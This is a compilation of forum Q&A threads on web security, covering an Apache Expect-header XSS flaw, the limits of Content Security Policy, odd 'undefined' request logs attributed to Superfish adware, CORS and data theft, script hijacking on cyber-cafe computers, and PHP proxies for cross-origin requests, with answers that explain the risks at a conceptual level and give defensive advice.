Could this have caused an XSS vulnerability? - javascript

I have had a scan performed on my website looking for vulnerabilities, etc. The report was returned saying there was a risk of an XSS attack, I have looked in to my website code and the only issue I can find (which is causing a W3C validation error) is that I have accidentally added 'language="javascript"' to my script tag...could this have thrown the error which they have reported? I don't have any form inputs and it is not connected to a database.
Many thanks, in advance.

No, using language="javascript" on your script tags won't make an XSS vulnerability, even though it's bad practice. I can't discern what your possible XSS vulnerability comes from without any relevant code, unfortunately.

Any reputable consultant should make it clear in their report exactly what the risk is and how it is reproduced. I'd expect to see documented methodology, findings and conclusions.
If they can't demonstrate a risk then they can't say they have found one.
UPDATE:
Based on your comment I've found the following, which identifies this as a general vulnerability with the Apache webserver rather than your particular code. You should ask whoever manages your webhosting to comment.
A flaw in the handling of invalid Expect headers. If an attacker can influence the Expect header that a victim sends to a target site they could perform a cross-site scripting attack. It is known that some versions of Flash can set an arbitrary Expect header which can trigger this flaw. Not marked as a security issue for 2.0 or 2.2 as the cross-site scripting is only returned to the victim after the server times out a connection.
see:
http://www.rapid7.com/vulndb/lookup/http-apache-expect-header-xss
also:
http://www.iss.net/security_center/reference/vuln/HTTP_Apache_Expect_XSS.htm
UPDATE 2:
The following is a description of the vulnerability (link). Ask your hosting people to check their servers are properly patched.
In May 2006 a reporter found a bug in Apache where an invalid Expect header sent
to the server (Apache 1.3.3 onwards) would be returned to the user in an error
message, unescaped. This could allow a cross-site scripting attack only if a
victim can tricked into connecting to a site and sending such a carefully
crafted Expect header. Whist browsers do not provide this functionality, it was
recently discovered that Flash allows you to make a connection with arbitrary
headers. The attack mechanism is therefore:
User is tricked into visiting a malicious web site with a flash-enabled browser
Malicious web site uses a flash movie to make a connection to the target site
with custom Expect header
This results in cross-site scripting (attacker could steal your cookies from
the third party site, or inject content etc)

If you're sure that no user input can ever make its way to be served on your pages, then there can't be any XSS.

Related

XSS - Content Security Policy

Can XSS be prevented 100% by setting the content security policy as default-src 'self'? Is there any way XSS can happen in that case? One possibility I can think of is injecting user input into one of your scripts dynamically at the server-side, do you agree? Are there any other vulnerabilities you can think of?
No, CSP is not a magic bullet. It should be one line of defense, not the entire defense. If properly configured it can help
preventing usable XSS where the payload, whether persistent or reflected must be small and therefore would usually just create a script element and inject external code
avoiding data extraction and misuse as platform to attack other sites. Depending on how your application works, access to your backend service may suffice to extract data, for instance, if your users can write blog posts an attacker could create a new post with the data it needs to extract, wait for a signal that the data has been grabbed (via a comment for instance) and delete the post again, all without communicating with external servers.
To answer the question, yes a modern browser with default-src 'self' can still execute user-controlled javascript: JSONP.
Of particular note is our lack of self in our source list. While
sourcing JavaScript from self seems relatively safe (and extremely
common), it should be avoided when possible.
There are edge cases that any developer must concern themselves with
when allowing self as a source for scripts. There may be a forgotten
JSONP endpoint that doesn’t sanitize the callback function name.
From http://githubengineering.com/githubs-csp-journey/
CSP should not be used as the only way to prevent XSS attack. This mechanism works only client side (If you save malicious data into your DB, then you can probably start infecting other systems that you integrating with) and it's not implemented by all browsers (http://caniuse.com/#search=csp).
To prevent XSS you should always validate input data and encode output data. You can also print warning message in JavaScript console to prevent somehow Self-XSS attacks (ex. open facebook page and turn on Chrome Developers Tools - look at the message in console).
Remember that the user input on the website is not the only source of XSS. Malicious data can also come from:
Importing data from files
Importing data from third party systems
Migration data from old system.
Cookies and http headers.
If you have appropriate validation and encoding of data (server side), then you can additionally apply browser mechanism such as: CSP, X-XSS-Protection or X-Content-Type-Options to increase your confidence about your system safety.

Requests to non-existing pages that all include "undefined”

Some odd requests appear on our logs since ~October 20, 2014. They've increased to about a few dozens a day so while not a big problem, it's still interesting to find out the reason.
Earlier ones:
REQUEST[/en/undefinedsf_main.jsp?clientVersion=null&dlsource=null&CTID=null&userId=userIdFail&statsReporter=false] REFERER[http://colnect.com/en/coins]
REQUEST[/fr/undefined/GoogleExtension/deals.html?url=http://colnect.com&subid=STERKLY&appName=HypeNet&pos=2&frameId=buaovbluurbavptkwyaybzjrqweypsbavwrviv] REFERER[http://colnect.com/fr]
REQUEST[/br/stamps/undefined49507173c45043eba6dfb9da540e52de&chnl=slmbBRex&evt=DailyPing&prd=vbates&seg=1&ext=1&rnd=65983fb77b62e25cc2a8ef15af18273d] REFERER[http://colnect.com/br/stamps/countries]
Some current ones:
REQ[/ru/collectors/collector/undefined] REF[http://colnect.com/ru/collectors/collector/jokitsos]
REQ[/th/collectors/collector/undefined] REF[http://colnect.com/th/collectors/collector/VRABEC]
REQUEST[/en/account/undefined] REFERER[http://colnect.com/en/account/request_password]
REQUEST[/pt/stamps/undefined] REFERER[http://colnect.com/pt/stamps/years]
Some requests are by logged in members and some not.
I'd guess some Javascript on their browser is trying to call a url by some uninitialized variable thus the "undefined".
Reasons may be similar to Odd requests to non-existing pages that all include "6_S3_" (perhaps malware) but I'm wondering if this might be a different reason.
I do doubt it's a bug on our client side Javascript as this would generate much more than a few dozens of such requests a day from about a million daily page views.
Any ideas? Is it worth pursuing?
This is a big concern, but it's not coming from you.
These are Javascript Injection attacks (client machine malware) using self-signed root certificate.
Specifically, sf_main.html, and deals.html have been linked to Superfish, which has been shipping with Lenovo's recently. As Lenovo has been pushing its new lines of PC's, reports of the attacks have blown up recently.
These Man-in-the-middle attacks start by hijacking the client's requests and and then injecting HTML and Javascript.
The reason there are so many undefined symbols is because Superfish, true to it's name, is fishing for plugins, extensions, and libraries it can take advantage of using their expected names, tokens, and paths. This is brute force XSS.
Oh, no, what can I do??
Little. Not much.
As the requests are being hijacked on the client machine and by http request hijacking, you won't know the difference. You could try to "fish" for certain kind of hostile "indicators" but now you are doing the work of Anti-Malware.
Lenovo claims that
SuperFish has completely disabled server side interactions (since
January) on all Lenovo products so that the software product is no
longer active, effectively disabling SuperFish for all products in the
market
While I trust the sincerity of China-based Lenovo, which has serious market interests in the Western world, I wouldn't trust the word of China based malware company Superfish.
These attacks are less a problem for you than your customers
Unless you work for a big bank or popular Social Networking site, it's highly unlikely that Malware like Superfish, has targeted you specifically. Your customer's bank and social network accounts are at risk, but not because of anything you did or can do to stop it.
As always, the cure for client side fishing attacks is good client side protection.
Any ideas?
There seem to be two different options here:
There are mistakes in your code causing incorrect URLs to get generated
There are (search) bots trying to parse your Javascript and failing to do it correctly.
(A client side extension is stirring up trouble)
To differentiate between the two you would need to set up more specific logging. For example adding the user agents to any log lines containing the string undefined will answer this question. If it's your code causing the problem you would also wish to log the referer header, as it will expose on which page the faulty URL's are being generated.
Another way to identify the issue is if you have an analytics solution running on your site such as Google Analytics you can quite easily limit your report to only url's containing undefined. If there are no such request you can conclude that it has to be a bot (as it wouldn't cause the client side analytics code to run), otherwise it provides all the information to identify where this problem is caused.
Lastly it might be a good idea to include a javascript error logging solution (in its simplest form a window.onerror handler with an ajax request to \log.something. If your code is generating undefined's it's quite likely that some errors are being triggered as well.
Is it worth pursuing?
If users are actually being served invalid pages, then yes, this is definitely something to be investigated.

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

how to prevent JS hijacking in public computers

This problem is regarding a JS hijacking scenario, and here it is :
Say Mr. Good has a website called "iamtooinnocent.com" which loads a "x.js" file to perform some particular tasks, and Mr. Bad is an evil cyber cafe owner, who has set a redirect rule in place that whenever any surfer using his cyber cafe visits Good's website then when the "x.js" file will be requested it will simply redirect it to some other evil domain which serves say a different "x.js" file with evil code in it, this way Good's website will never come to know that it has got a different JS file than what it has requested.
I hope I have explained the scenario properly, so my problem is how can this be prevented? Is there really a way to prevent this? Can this be prevented by serving the JS file using HTTPS, though I am not so sure? Can anybody give me some heads up regarding this?
Thanks in advance.
HTTPS is standard for fighting man-in-the-middle attacks like one you've described. It encrypts all traffic using public certificate of your site. So it's not possible to change it. And the certificate itself is verified by third party certificate authorities.
But it can't guarantee 100% security because it's possible to create a local fake certificate authorities available only in cafe.
If the computer owner is against you....you will have a hard time. The browser guarantees certain security rules, but the computer owner can modify it to his evil heart's content and you would be none the wiser...
Rule #1 in web security boils down to: NEVER trust the client.
Remember that clients can do just about anything with the data you are sending them, and the data they send YOU:
modify cookies for subsequent requests
alter or add/remove other HTTP headers, spoof User Agents
Specify any combination of data in GET/POST
You should assume any data coming IN from HTTP to your application is a malicious, tained, evil mess, and sanitize accordingly.
Is this the sort of cyber cafe where they provide the computers? If so, you just have to trust the owner, because you can't have security on somebody else's machine. If nothing else, they can install a hardware keylogger.
If this is the sort where they provide a wireless connection and you bring your laptop, HTTPS should be a safeguard. If your browser handles certificates and SSL properly, it should be possible to go to a site that has a verified certificate and be safe. If there's any problems in your browser, of course, the cyber cafe owner is in an ideal position to take advantage of it, so you might want to keep an eye on known vulnerabilities.
The best move is not to patronize cyber cafes run by evil owners, but that can be difficult in some parts of the world.

What are the disadvantages to using a PHP proxy to bypass the same-origin policy for XMLHttpRequest?

http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious, that you can use a proxy to get XML or JavaScript on another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about disadvantages over other methods -- are there, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
Overhead -- both for the user (who know hsa to wait for you server to make and receive data from the proxied source) and you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.

Categories